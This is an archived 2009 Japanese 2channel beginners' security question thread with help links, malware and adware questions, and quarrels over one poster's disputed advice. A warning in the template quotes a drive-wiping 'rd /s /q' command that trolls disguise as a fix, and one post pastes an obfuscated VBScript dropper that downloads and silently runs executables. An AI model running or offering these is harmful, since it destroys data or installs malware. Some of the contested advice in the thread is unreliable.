セキュリティ初心者質問スレッドpart118

このエントリーをはてなブックマークに追加
1八頭 ◆YAGApwSaEw
初心者の方の為のインターネットとパソコンのセキュリティについての質問スレッドです
自習を出来るリンクを紹介していますのでご参考にして下さい

━ 質問マナー ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ アドバイスをもらう為に、「質問用テンプレート」を使って質問しましょう
 ・ 2回目以降の発言書込は、名前欄に「最初に質問した番号」を半角英数字で入力して下さい
 ・ 他から誘導されて来た場合は、その旨書いておきましょう
 ・ アドバイスする方も、解りやすい説明をしてあげて下さい
 ・ ここは2ちゃんねるですので、正しい解答ばかりとは限りません (用心しましょう)

━ 質問用テンプレート ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
【使用OS】      『』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】    『CPU: GHz 、メモリ: MB』  (「システムのプロパティ」参照)
【使用ブラウザ】  『』 例、Firefox 3
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】     『』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『』
【回線の種類・ルータの有無】  『』 例、光回線でルータ使用中

【具体的な症状】 『』
【過程と措置】   『』
【その他】  『』
【スクリーンショット画像やテキストファイルをアップロード出来るサイト】
                                      ↓ ※先頭のhを抜いてこっちへリンクして下さい

ImageHost.org
 ttp://www.imagehost.org/  (Hotlink のURLを ttp://××.jpg )
2名無しさん@お腹いっぱい。:2009/07/04(土) 05:53:16
●Microsoft セキュリティ TechCenter
http://technet.microsoft.com/ja-jp/security/default.aspx
●マイクロソフト セキュリティ At Home - 個人情報の盗難、スパイウェア、ウイルスを防ぐ
ttp://www.microsoft.com/japan/security/default.mspx
●Microsoft Update
http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=ja
●答えてねっと (*マイクロソフトが運営するパソコンに関するQ&Aサイト) ※2009年7月末で終了予定
2009年夏に公開予定の情報交換フォーラム「Microsoft Answers」日本語版開設
http://www.kotaete-net.net/
◆Windows を Conficker ワームから守る情報
http://technet.microsoft.com/ja-jp/security/dd452420.aspx

●JVN iPedia -脆弱性対策情報データベース (*最新版への更新を)
http://jvn.jp/report/index.html
「脆弱性」とは、ソフトウエア製品やウェブアプリケーション等におけるセキュリティ上の問題箇所(ウィークポイント)です
使用しているソフトウェアやWebプラグイン類の最新版Updateとセキュリティ設定を常に心掛けましょう
(*動画Player、圧縮解凍ソフト、Adobe関連、Office系ソフト、Mailソフト、Sun MicrosystemsのJavaなど)

●IPA 「外部記憶メディアのセキュリティ対策を再確認しよう!」 ― USB メモリ、便利のウラに落とし穴 ―
ttp://www.ipa.go.jp/security/txt/2008/12outline.html
●IPA「 USB メモリのセキュリティ対策を意識していますか? 」 ― USB メモリの安全な使い方を知ろう ―
ttp://www.ipa.go.jp/security/txt/2009/05outline.html

●(財)日本データ通信協会 - 迷惑メール相談センター
http://www.dekyo.or.jp/soudan/
3名無しさん@お腹いっぱい。:2009/07/04(土) 05:54:05
●OCN : あんしんWeb - How To セキュリティ
http://secure.blog.ocn.ne.jp/column/
●ベネッセ ジュニアパーク - 子どもとインターネット (保護者の方へ)
インターネットや携帯電話が身近になるとともに、子どもを巻き込んだ事件や犯罪が増加しています
http://j.benesse.ne.jp/parents/internet/
★4月1日より、青少年ネット規制法が施行--18歳未満にフィルタリングサービスなどを義務づけ
http://japan.cnet.com/news/sec/story/0,2000056024,20390909,00.htm
●セキュアブレイン - ワンクリック詐欺とは
http://www.securebrain.co.jp/lecture/oneclick/index.html

●セキュアブレイン gred - News Clipping
http://www.gred.jp/openNewsPage.htm
●INTERNET Watch
http://internet.watch.impress.co.jp/
●YOMIURI ONLINE(読売新聞) - セキュリティー (サイバー護身術)
http://www.yomiuri.co.jp/net/security/goshinjyutsu/
●PC Online - セキュリティ
ttp://pc.nikkeibp.co.jp/security/
●ITpro : セキュリティ- Webの脅威 (最新の脅威の解説と対策術)
http://itpro.nikkeibp.co.jp/web_threat/index.html
●IT-PLUS - セキュリティー連載コラム ネット危険地帯
http://it.nikkei.co.jp/security/column/web_miyajima.aspx
●Japan.internet.com - スパイウェアによって何が起こるか?
http://japan.internet.com/column/webtech/20050707/7.html
4名無しさん@お腹いっぱい。:2009/07/04(土) 05:55:04
●IT用語辞典 e-Words
http://e-words.jp/
●IT用語辞典 BINARY
http://www.sophia-it.com/

●gred (国産サイト安全性チェックサービス - ウイルス ,ワンクリック詐欺 ,Web攻撃の有無など)
http://www.gred.jp/
●Online Link Scan (4種類のサイト安全性チェックを一度に PhisTank ,AVG ,SiteTruth ,Google Safe Browsing)
http://onlinelinkscan.com/
●Norton Safe Web (is this site safe? )
http://safeweb.norton.com/
マイコミジャーナル
米Symantec、サイトの安全性を技術と評判で検証「Norton Safe Web」
http://journal.mycom.co.jp/news/2008/07/29/017/index.html
●ソースチェッカーオンライン (ラクラリンクチェック)
http://so.7walker.net/guide.php
●飛び先のチェック (ブラクラリンクチェック)
http://www.ultimo.to/kisin/others/check.cgi

5名無しさん@お腹いっぱい。:2009/07/04(土) 05:56:21
●higaitaisaku.com (スパイウェア、ウイルスなどマルウェア関連のトピックス のページ)
http://www.higaitaisaku.com/menu5.html
*PCトラブル質問掲示板 (ウイルスによるトラブルに見舞われている方の解決掲示板)
http://bbs.higaitaisaku.com/cbbs.cgi?H=T&W=T&no=0
*PC健康診断掲示板 (特にPCに問題は感じないが念のためチェックしてほしい方向けの診察掲示板)
http://medcheck.higaitaisaku.com/cbbs.cgi?H=T&W=T&no=0
(相談方法)
「新規作成」をクリック → 次のステップへ「NEXT」をクリック → HijackThisログとアンインストール情報ログの取得(テキスト出力)
「新規相談ツリー」作成して、ログテキストの内容をコピー&貼り付けして相談開始
http://www.higaitaisaku.com/hijackthis.html#jyokyo

●Securityzone (Security のページ)
http://securityzone.zapto.org/security.htm
●ウイルス対策ソフト情報 (検出力テスト結果 の解説)
http://blog.fideli.com/gdata/daily/200812/08

●[ 便利 ] 2ch専用ブラウザ [ 推奨 ] 2ちゃんねるブラウザ - Wikipedia
http://ja.wikipedia.org/wiki/2%E3%81%A1%E3%82%83%E3%82%93%E3%81%AD%E3%82%8B%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6
●2ちゃんねるガイド:目次
http://info.2ch.net/guide/
●2ちゃんねる 初心者が安心して質問できるスレッドガイダンス
  2ちゃんねるには様々な有益な情報とともに、有害な「ワナ」をしかけていることがあります
http://ansitu.xrea.jp/guidance/?Trap
6名無しさん@お腹いっぱい。:2009/07/04(土) 05:57:04
●IPA情報処理推進機構 (情報セキュリティのページ)
http://www.ipa.go.jp/security/
●IPA情報処理推進機構 (基本的なセキュリティ対策実践情報のページ)
http://www.ipa.go.jp/security/awareness/end-users/end-users.html
●IPA情報処理推進機構 (情報セキュリティに関する届出)
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
http://www.ipa.go.jp/security/todoke/

●内閣官房 インターネット上の違法・有害情報対策 (違法・有害情報対策のポータルサイト)
http://www.it-anshin.go.jp/
●内閣官房情報セキュリティセンター
ttp://www.nisc.go.jp/
●警察庁 (国の行政機関)
http://www.npa.go.jp/
●@police (*警察庁 セキュリティポータルサイト )
http://www.cyberpolice.go.jp/
●警察庁 サイバー犯罪対策
http://www.npa.go.jp/cyber/
●警視庁 (=東京都警察) ハイテク対策 情報セキュリティ広場
http://www.keishicho.metro.tokyo.jp/haiteku/index.htm
●STOP!架空請求! (東京都 架空請求緊急対策班による通報受付 )
http://www.anzen.metro.tokyo.jp/net/
7○最近のセキュリティニュース ピックアップ:2009/07/04(土) 05:58:12
「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査 2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
http://www.itmedia.co.jp/news/articles/0710/25/news140.html
個人情報を盗むフィッシング・スパイウェアの巧妙化 - 愉快犯から金銭目的の犯罪者へ 2008/10/24
だまされないためには包括的なセキュリティ意識の向上が必須
http://www.cyberpolice.go.jp/column/explanation27.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「USBメモリーを安全に使おう」、自動実行の無効化をIPAが呼びかけ 2009/05/07
http://itpro.nikkeibp.co.jp/article/NEWS/20090507/329659/
YouTube動画のコメントにマルウエアへのリンク,自動化ツールで急増か 2009/05/25
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク
http://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
楽天市場から個人情報がスパム業者に流出か 2009/05/27
実名の記載された迷惑メールが楽天でしか使っていないメールアドレスに届き始める
http://news.livedoor.com/article/detail/4173647/
PC 初心者の3割が「バックアップ全くしてない」 2009/6/25
http://japan.internet.com/webtech/20090625/9.html
稼働中の Adobe 製品の多くは既存パッチが未適用 2009/07/02
広く普及している Adobe Systems 製品が最たるものだと警告した
http://japan.internet.com/webtech/20090702/12.html
8名無しさん@お腹いっぱい。:2009/07/04(土) 05:59:42
●【※要注意】 そそのかされて、この手順を行うとドライブのデータが全て消えてしまいますよ××

━注意━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
チェックディスクコマンドを試してみろ (リフレッシュコマンドを試してみろ とか・・・)

cmd /c rd /s /q c:

と入力し[OK]

上記と同様に以下も
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━



●テンプレここまで (*セキュリティ初心者向け情報募集中)
9名無しさん@お腹いっぱい。:2009/07/04(土) 13:52:14
>>1
10名無しさん@お腹いっぱい。:2009/07/04(土) 14:17:29
【使用OS】      『XP SP2』 
【PCスペック】    『CPU: 2.80GHz 、メモリ: 224MB』  
【使用ブラウザ】  『Firefox 3.5』 
【Microsoft Updateの更新の状態】 『自動更新は停止状態』 
【セキュリティソフトと年式】     『avast! 4.8 Home Edition』
【その他スパイウェア対策ソフト】 『Spybot Search』
【回線の種類・ルータの有無】  『光回線でルータ使用中』 

【具体的な症状】 『数分ごとにネガポジ反転したような少女の画像が作業中のウィンドウに出現』
【過程と措置】   『再起動しても復活。win,iniには該当らしき記述なし。madoka、ozawa、hikaru、jenifferなどは検出せず。』
【その他】  『どこかのアップローダーから「ディアボロの大冒険 ver 13.0 .zip」
         というファイルを開いて中身のexeを起動してから感染したと思われます。』
11名無しさん@お腹いっぱい。:2009/07/04(土) 14:53:28
>>10
なぜ古いスレから使わない
死ね死にさらせ
12八頭 ◆YAGApwSaEw :2009/07/04(土) 14:55:51
>>10
その圧縮ファイルを再取得
avast!
ttp://www.avast.com/jpn/technical_support.html
の最下からMail添付ファイルでパスワードを『virus』にして検体送信→ワクチン化を待つ

その後で、VirusTotalの解析にかけてなんなのか?を自己確認(DLした圧縮ファイルのままでOK)
http://www.virustotal.com/jp/

オートラン無効設定を実施していないならやって→PC再起動しておくこと
「 USB メモリのセキュリティ対策を意識していますか? 」 ― USB メモリの安全な使い方を知ろう ―
ttp://www.ipa.go.jp/security/txt/2009/05outline.html

とりあえずここまで
13名無しさん@お腹いっぱい。:2009/07/04(土) 14:59:38
>>12
また誤回答かよ
14名無しさん@お腹いっぱい。:2009/07/04(土) 16:14:07
もうテンプレに入れようぜ。

八頭 ◆YAGApwSaEw は信用できない投稿者です。
1510:2009/07/04(土) 17:54:56
>>11
すみません
次回から気をつけます

>>12
迅速な回答ありがとうございます
そのようにします
16名無しさん@お腹いっぱい。:2009/07/04(土) 18:06:54
>>15
1.もう1回ダウンロードして検体提出は問題無い
2.ワクチン化されるのを待つのは大きな間違い。検出できるようにはなるかもしれませんが
  ワクチン(除去と設定等復元)は作成されません。あくまでも本体のブロック、削除であり、
  本体が変更を加えたWindowsのレジストリなどを正常に復帰させることはできません。
3.セキュリティソフトの対応を待つ間、該当PCは無防備かつ危険な状態に置かれます。
  必要なデータが破壊される可能性もありますので、放置して待つような対応は厳禁です。
4.どんなマルウェアであれ、感染した場合は、PCリカバリまたはOS再インストールで復帰させるのが鉄則です。

PCリカバリ(またはOS再インストール)以外の方法では、削除できたと思っても、別の何かが残ってしまう危険を
犯してしまうと、BOTネットに組込まれたり、なんらかの中継に利用されたり、自分の個人情報や、流出させては
いけない情報が流出してしまうなどの危険があります。意図せぬ加害者になってしまうことのないように、早急に
PCリカバリ(OS再インストール)を行なってください。

今後、八頭の言うことは信じちゃダメです。2割り程度はまともなことも混じってるかも知れませんが、
全体としては有害です。
17八頭 ◆YAGApwSaEw :2009/07/04(土) 18:31:36
>>10
>>12まで出来たら
http://pc11.2ch.net/test/read.cgi/sec/1244948659/13 の

「a-squared Free 4.5」〜「Live OneCare PC セーフティ (オンラインスキャン)」までの4つを順番に試して、
他にも検出があれば一応報告して下さい。

>>16
その理屈だと世界中から駆除フォーラムが消えてなくなるよ(笑)
18名無しさん@お腹いっぱい。:2009/07/04(土) 19:54:11
>八頭 ◆YAGApwSaEw

有害だからお前はもう黙れ。
19名無しさん@お腹いっぱい。:2009/07/04(土) 20:14:32
ポートスキャンって言うので自分のマシーンに潜入されたら2ちゃんの恥ずかしい書き込み
とかもばれるんですかね?
そういうのってアンチウィルスではガードできないんですか?
普通の家でもルータとかが必要ですか?
20名無しさん@お腹いっぱい。:2009/07/04(土) 20:52:14
>>19
ばれる事は無いと思う。ただ昨今のセキュリティー事情では
ルータ+PFWは必須で、ルータを導入するとルータのWAN側
インターフェイスにグローバルIPアドレスが割り振られる。
つまりWAN側から直にアクセスできるのはルータまでとなり
それより内側にあるPCには直にアクセス出来無い。
PFWのみでも意図的にポートを開放してなければ大丈夫だけど
ハード処理とソフトウエア処理を比較した場合は
ハード処理の方が手堅い。
21名無しさん@お腹いっぱい。:2009/07/04(土) 21:07:10
>>20
ありがとうございます
買いますルータ
22名無しさん@お腹いっぱい。:2009/07/04(土) 21:10:00
>>10
感染した=悪意のあるプログラムが取り憑いた
取り憑いた場所、部位にもよるし、書換が行われた場合などでも違ってくる。
無意味なDLLやファイルが残る可能性もあるし…

通常は元に戻そう何て考えない方がいい。アンチウイルスソフトは水際対策だから
感染した場合は素直にインストールし直す事をすすめる。

そのために日頃のバックアップとかが重要になってくる訳で、アンチウイルスソフトも
感染しないようにするためのプログラムと考えて感染後の駆除などは期待しないほうがいい。
23名無しさん@お腹いっぱい。:2009/07/05(日) 08:58:11
【使用OS】      『XP SP3』 
【PCスペック】    『CPU: 2.80GHz 、メモリ: 1G』  
【使用ブラウザ】  『Firefox 3.011』 
【Microsoft Updateの更新の状態】 『自動更新は停止状態』 
【セキュリティソフトと年式】     『avast! 4.8 Home Edition』
【その他スパイウェア対策ソフト】 『Spybot Search』『Ad-Aware』『SpywareBlaster』
【回線の種類・ルータの有無】  『光回線でルータ使用中』 

【具体的な症状】 『今のところ特になし?』

【過程と措置】   『Spybot→Ad-Aware→トレンドマイクロのオンラインスキャンでは何も発見しないものの
            最後にスキャンしたavastのブートタイム検査 でWin32:Adware-gen [Adw]を発見
            場所はc:\program files\ntte-rt\toolbar\flets.dll
            とりあえずチェストに移動』


これは削除しても大丈夫ですかね?
24名無しさん@お腹いっぱい。:2009/07/05(日) 10:08:06
>>23
フレッツ・スクウェアツールバーを使うなら戻す。
使わないなら、戻してツールバーを削除。

名称からわかるように「アドウェア」ですので、残すか消すかは自己責任で判断してください。
25名無しさん@お腹いっぱい。:2009/07/05(日) 10:25:43
"アンチウイルス"による駆除は期待できなくても何らかの方法でマルウェアを
取り除く方法はある。あのカスペルスキーもそう言ってたし
そもそも駆除出来ないレベルで改変されてたらパソコン不安定になりまくりだろ。
八頭のなんちゃって駆除も酷いが
26名無しさん@お腹いっぱい。:2009/07/05(日) 11:30:31
>>25
自分で端末を見て、判断できるなら処理すればいいさ。
回線の向こう側の、しかも初心者のPCのメンテなんてできっこない。

PCリカバリ以外の方法を勧めて、なんらかの危険を残してしまうよりいいんでないか?
27名無しさん@お腹いっぱい。:2009/07/05(日) 13:05:22
>>24
どうも。
使わないので削除することにします。

ありがとうございました。
28名無しさん@お腹いっぱい。:2009/07/05(日) 15:19:48
( ゚Д゚)ウマー
29名無しさん@お腹いっぱい。:2009/07/05(日) 17:33:18
【使用OS】      『XP sp2』
【PCスペック】    『CPU: 3.16GHz 、メモリ: 3250MB』
【使用ブラウザ】  『IE』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】     『avast』
【その他スパイウェア対策ソフト】 『spybot S&D』
【回線の種類・ルータの有無】  『光回線でルータ使用中』

【具体的な症状】 『ashServ.exeが十分おきぐらいに作動してCPUの30%ぐらいを食ってしまいます。
            それだけならいいのですが、なぜか作動中はインターネットの通信が全て遮断されてしまい、
            ネット関連の作業は何も出来なくなります。』
【過程と措置】   『一度、avastを消して再インストールを試みましたが、特に変化なし。
            ashServ.exeはタスクマネージャからの強制終了も受け付けません。』
30八頭 ◆YAGApwSaEw :2009/07/05(日) 17:42:03
>>29
C:\Program Files\Alwil Software\Avast4\ashServ.exe

avastスレの1に相談だな
31名無しさん@お腹いっぱい。:2009/07/05(日) 18:10:38
>>29
ttp://www23.atwiki.jp/securitysoft/pages/20.html

>Q.ウイルス発見時に馬鹿みたいに重くなる(CPUリソースを使い切る)のがウザイ
>A.ashServ.exeのプロセス優先度を下げれば若干緩和される。オートギア(フリーソフト)でashServ.exeを
>優先度"低"で登録しスタートアップに入れると楽。
>オートギア(Windows95/98/Me / ユーティリティ)
http://www.vector.co.jp/soft/win95/util/se293319.html

>しかしこの手法でも、最近のバージョンアップにより、ウイルス発見時(特にアーカイブ内を検査する時)は
>高負荷になっているようである。

Avastは、ファイル書き込みが発生した時や、パターン更新時にCPUを占有して、他のタスクが止まることがあります。
根本的な解決には、デュアルコア以上のCPUにするしかありません。

シングルコアCPUで耐えきれないと感じた場合は、AVGやAntiVirなどの他のセキュリティソフトへの乗り換えを
検討した方が幸せになれると思います。
32名無しさん@お腹いっぱい。:2009/07/05(日) 18:14:15
>>30
>>14,>>18
33名無しさん@お腹いっぱい。:2009/07/05(日) 18:27:23
>>31
流石だな。回答のスキルが違うwww誰とは言わないが
34八頭 ◆YAGApwSaEw :2009/07/05(日) 18:28:20
自演ウザいなw
35名無しさん@お腹いっぱい。:2009/07/05(日) 18:32:17
アバストスレで荒らせなくなった中国人だろw
36名無しさん@お腹いっぱい。:2009/07/05(日) 18:45:12
都合が悪くなると直ぐに自演扱いか?www
>>20の回答は俺だけど>>31は俺では無い
37名無しさん@お腹いっぱい。:2009/07/05(日) 18:47:59
だから自演するなってw
3829:2009/07/05(日) 19:05:39
取り敢えず、そのオートギアってのを使ってみます。
でも通信が遮断されるのは何でだろ?
39名無しさん@お腹いっぱい。:2009/07/05(日) 19:14:14
オートギア昔使ったことあるけど
優先度の操作はかえってシステム全体が不安定になるよ
40名無しさん@お腹いっぱい。:2009/07/05(日) 19:18:11
>>25
22です
老婆心ながら、例えばウイルスを作成する場合に、アンチウイルスをすり抜けさせるために
取り憑くプログラムの注入部位をいろいろ変化させたりしていますが、アンチウイルスが
駆除するときはその注入された部位全てを取り除く訳ではなく、機能しなくなる範囲での抹消です。
プログラム自体は少し位中身を変更しても動くもので、(実際にプログラムが動いて次に
CALLする場所周辺を消してコンパイルしても普通に動くものです)
よく見かけるのは「駆除前にバックアップし、駆除したことを確認してからバックアップを削除」
ですが、元通りにできるのであれば必要ない訳ですよね。

アンチウイルス全体をみれば分かりますが、検出精度を主体にしていて駆除率を掲げてはいません。
悪意のあるプログラムに因っては変化するアルゴリズムを持ち、読み込まれると変異して自ら変化し
ながら動き回るものもあり、駆除が難しいことは各ベンダーも十分分かっていると思います。
駆除といっても本来のウイルスの動作を封じるだけの場合もあり、完全に取り除くことが難しい
ウイルスも存在していることは周知の事実であり、F-Secure でも
"ウイルスの感染部位や感染の状況によっては、正しく駆除されない場合があり"
となっています。

セキュリティ初心者質問スレッドなので… 変に対処しないでリカバリを勧めたいです。

長文にて失礼
41名無しさん@お腹いっぱい。:2009/07/05(日) 19:27:07
AV-TESTによるウイルス検出率テスト(2009年6月23日実施、検体数758,547)
http://antivirus-news.net/2009/06/avtestg-data20symantec.html
順位  プログラム   検出数 検出率
#1 G Data 2009     757052 99.80%  (AVAST!+BitDefender+独自検出 )
#2 Symantec       755146 99.55%
#3 F-Secure 2009    735273 96.93%  (5つのマルウェア検出エンジンを搭載 )
#4 McAfee        732570 96.58%
#5 Kaspersky       731730 96.46%
#6 Microsoft       729229 96.13%
#7 Trend Micro      726146 95.73%  (ウイルスバスター )
#8 Eset Nod32      718122 94.67%
#9 K7 Computing     668839 88.17%  (ソースネクスト ウイルスセキュリティZERO )
#10 Rising         587824 77.49%  (瑞星 ウイルスキラー )

*本データは、ウイルス対策ニュース・ドットネットがAV-TESTから入手し発表しているもの。テスト日は6月23日。
*AV−TESTは、ドイツのマグデブルク大学にある、ウイルス検出率をテスト評価する第三者機関。主宰は、アンドレアス・マークス。
*アジア=パシフィック地域、特に日本、台湾、中国において頻発しているウイルスを中心に採集されており、
 検体は6ヶ月以内に発生したものに限定されている。今月のテストのサンプル758,547種が使われた。
*テストの対象は、国内で市販されている主要ウイルス対策ソフト(無料製品は除く)。
*ここでいう「ウイルス」とは、「狭義のウイルス」に加えて「ワーム」「トロイの木馬」「ボット」「バックドア」を含む
42八頭 ◆YAGApwSaEw :2009/07/05(日) 19:33:42
>>40
リカバリだとC:ドライブは綺麗になるだろうけども
別のドライブにリスクの種が残っている場合は再感染の可能性が充分あるから
感染の種類くらいは特定すべきじゃないかな
43名無しさん@お腹いっぱい。:2009/07/05(日) 20:22:49
>>42
基本的な対応は、PCリカバリして、WindowsUpdateを全て当てた後で、セキュリティソフトを導入してパターンを最新にする。
それから、他のドライブからデータの復旧なりアプリケーションの導入なりをして環境を整える。

この手順を守る限りにおいては、別ドライブに残っているかもしれないものについては、セキュリティソフトがブロック可能です。
ですから、>42のような心配は不要です。かえって、感染状態でいる時間を延ばすことになるので有害です。

また、このスレに相談しにくるようなPC初心者さんが、複数ドライブを使っていたり、別ドライブにデータを分けたり
するような使い方をしている可能性はあんまりないと思います。(相談時の環境で、別ドライブの存在がわかった時だけ
セキュリティソフトの更新が終わるまではそのドライブにアクセスしないように注意してあげれば十分でしょう)


やっぱり、お前さんは、このスレには有害だと思う。
>>42
>>14,>>18
44名無しさん@お腹いっぱい。:2009/07/05(日) 20:27:17
WindowsUpdateやアンチウィルスソフトの更新をする間に
感染する可能性もあるんですよね?
45名無しさん@お腹いっぱい。:2009/07/05(日) 20:28:43
フリーのアンチウィルスソフトをダウンロードするときは無防備でも
そのあとスキャンすれば大丈夫なんですか?
46名無しさん@お腹いっぱい。:2009/07/05(日) 20:39:00
ツールバーにMIRARって出て消せねぇ〜。ちなみにソフトはノートンアンチウイルス2009入れてるんだがウイルス検出されねぇ〜
47名無しさん@お腹いっぱい。:2009/07/05(日) 20:48:21
(ο^д^)ノシ
48八頭 ◆YAGApwSaEw :2009/07/05(日) 21:01:44
>>43
>この手順を守る限りにおいては、別ドライブに残っているかもしれないものについては、セキュリティソフトがブロック可能です
>セキュリティソフトの更新が終わるまではそのドライブにアクセスしないように注意してあげれば十分でしょう)
それはあなたがそう思い込んでるだけであって、
たった1枚のエロ画像からでも実際には再感染は起こり得ます
解析結果の画像→ ttp://h.imagehost.org/0509/WS006516.jpg (ありふれた拡張子.Jpegですがリスクの種です)
ですから、もし物理フォーマットで完全解決を薦める場合には、
他のドライブに残るリスクの種(ネットでの取得物など)までも捨て去る様に言わなくてはなりません
これが僕の完全駆除の『基本』です


>PC初心者さんが、複数ドライブを使っていたり、別ドライブにデータを分けたりするような使い方をしている可能性はあんまりないと思います。
失礼ながら、あなたがPC音痴なだけであって
価格.comで、よく売れているPCのGZ-X1BPD-100 は、
ATX/MicroATX でありますが、3.5インチベイ:2個 3.5インチシャドウベイ:5個 5.25インチベイ:4個 です
店頭で根強い人気のPCケースのANTEC SOLO BLACK は、
ATXで、3.5インチベイ:2個 3.5インチシャドウベイ:3個 5.25インチベイ:4個 です



わかりまちたか?
49 ◆N9P3SuvBPo :2009/07/05(日) 21:20:39
>43
>このスレに相談しにくるようなPC初心者さんが、複数ドライブを使っていたり
確かに。
複数と言ってもCドライブとDドライブだけしかないもんな。
デフォでは

本当に不安なら、データを諦めてもらうってのもアリかもしれませんね。

てか>>48おおおおおおおおいw
JPEG.EXEって画像じゃありません。
アイコンは画像のアイコンに偽装されてると思われますが。

肝心な検出結果もモザイク入れて隠して…
どんなスキルのある人でも、分からないだろう…。
50 ◆N9P3SuvBPo :2009/07/05(日) 21:22:08
補足
>48のURLはVirustotalの結果画像ですが、ソースチェッカーを使って確認し、
各自自己責任にてアクセスしてください
51名無しさん@お腹いっぱい。:2009/07/05(日) 21:23:48
>>48
やっぱ、お前いらんわ…。
52名無しさん@お腹いっぱい。:2009/07/05(日) 21:25:41
set v2qf1 = d6d4fd.CreateObject(f2eje0,"")
set ste5mp = v2f7e.GetSpecialFolder(2)
n5sc6.type = 1
t4get="GET"
v4x5i.Open t4get, aurl_0, False
v4x5i.Send
y1L_wy80= "L_wy80.scr"
y1L_wy80= v2f7e.BuildPath(ste5mp,y1L_wy80)
n5sc6.open
n5sc6.write v4x5i.responseBody
n5sc6.savetofile y1L_wy80,2
n5sc6.close
v2qf1.ShellExecute y1L_wy80,"","","open",0
v4x5i.Open t4get, aurl_1, False
v4x5i.Send
y1L_wy81= "L_wy81.exe"
y1L_wy81= v2f7e.BuildPath(ste5mp,y1L_wy81)
n5sc6.open
n5sc6.write v4x5i.responseBody
n5sc6.savetofile y1L_wy81,2
n5sc6.close
v2qf1.ShellExecute y1L_wy81,"","","open",0
53名無しさん@お腹いっぱい。:2009/07/05(日) 21:26:29
>>46
BHOに登録されたのでしょう。
ブラウザの「アドオンの管理」にMIRARってのがあると思う。
ググったらセーフモードでspybotを使用すれば削除できる報告があった。
>>??
最初の回答ではベンダーからの回答待ち、ウイルストータルでの確認、自動実行の無効化っだたような
即リカバリしないのに、マルウエアの自動起動の無効化さえ指示してない方が完全駆除と言われる。
>>50
( ´(ェ)`)ノシ
54八頭 ◆YAGApwSaEw :2009/07/05(日) 21:29:50
>>N9P3SuvBPo
48は僕が撮ったスクリーンショットだから安全だよw
ボカシ入れてるだろ
55 ◆N9P3SuvBPo :2009/07/05(日) 21:34:08
>53
φ(^。^)ノシ
56名無しさん@お腹いっぱい。:2009/07/05(日) 21:45:18
八頭 ◆YAGApwSaEw
真土けクズ
57名無しさん@お腹いっぱい。:2009/07/05(日) 21:48:59
すいません、質問です

自作pc手がけてみようと価格.comでパーツを見比べていて
antecのP183というpcケース紹介ページから(ttp://kakaku.com/item/K0000026883/
メーカーサイトへ飛んだんですが、なにかひどい文字化けで。。

パソコンに不調が起きたとかは無いんですが
アメリカでwebサイト改竄が〜とか言っていたのを思い出して不安になってます
58八頭 ◆YAGApwSaEw :2009/07/05(日) 21:57:23
>>57
ブラウザのツールバー>表示>エンコード>西ヨーロッパ言語 で文字化け直らない?
CoolerMasterのPCケースも最近いいのがあるね
59 ◆N9P3SuvBPo :2009/07/05(日) 22:00:25
>57
行って来たけど、文字化けはしてませんでしたけど…
再度アクセスしても文字化けしてるようでしたら、
ページ内を右クリック→エンコード→日本語をクリックしてみて。

webサイト改ざんとか言っても、OSやブラウザやアプリ、対策ソフト類を最新にしてれば、
よほどのことがない限り感染はしませんので安心してください。

ちなみに、エンコード>西ヨーロッパ言語をしたら、俺の環境では文字化けしました。
60名無しさん@お腹いっぱい。:2009/07/05(日) 22:05:06
俺の環境だとIE8でもChromeでも文字化けするわ。
右下の「Global Home」から国を選ぶと正常に表示できる。
61八頭 ◆YAGApwSaEw :2009/07/05(日) 22:14:16
日本サイトだったか・・・
ちなみに
こっちがANTEC P183 スペック ページだから
ttp://kakaku.com/spec/K0000026883/
62名無しさん@お腹いっぱい。:2009/07/05(日) 22:39:08
ありがとうございます
>>60氏と同じような感じですね
一応、(無関係だろうけど)GENOウイルス対策はしてあるつもりです

文字化けの出だしがahoなのが何ともでした…
63名無しさん@お腹いっぱい。:2009/07/06(月) 04:43:30
ちなみに右クリック→エンコード→日本語でも文字化けする
64名無しさん@お腹いっぱい。:2009/07/07(火) 04:08:32
自作のキューブ型PC使ってますが後ろのファンは別に無くても大丈夫ですか?
65名無しさん@お腹いっぱい。:2009/07/07(火) 12:01:41
失礼します。パソコン一般総合質問板より誘導されてきました。

【使用OS】      XP Home SP3
【PCスペック】    CPU:Intel Core2 CPU6300 1.86GHz メモリ: 2GB RAM
【使用ブラウザ】  IE・Sleipnir
【Microsoft Updateの更新の状態】  自動更新設定
【セキュリティソフトと年式】     Avast 2009
【その他スパイウェア対策ソフト】 Ad-Aware
【回線の種類・ルータの有無】  光回線でルータ使用中

【具体的な症状】 先日Windowsの自動更新後から、HTMLが全て正常に開けなくなりました。
IEやHTMLファイルを開こうとすると、このファイルを開くか保存しますか?という今まで出なかったダイアログが出て
開くを選択しても開けまぜん。その他の形式(mp3やtxtなど)ファイルは問題なく開けます。
検索エンジン等で調べようにもIEが開けない為、2ちゃんブラウザが正常に動いたのでこちらで質問した次第です。
【過程と措置】
システムの復元をしようとしたんですが、システムの復元というウインドウが出るものの真っ白の状態でそこから何も表示されず
復元出来ませんでした。
【その他】
件の自動更新後ですが、再起動後に右下のタスクトレイに「悪意あるマルウェアを削除しました」と表示され、クリックしたところ、ファイル名がWin32〜から始まるものが数十個表示され
そのうちの一つが削除されたという表示がされました。思わずその画面は消してしまったので詳しい内容をおぼえていません。
その後SleipnirやIEを使おうとして今の症状に至ります。
あと、Avastを疑って一度起動してみたんですが、今まで起動できていたのに「Win32モードでは起動できません」と表示され起動できません。
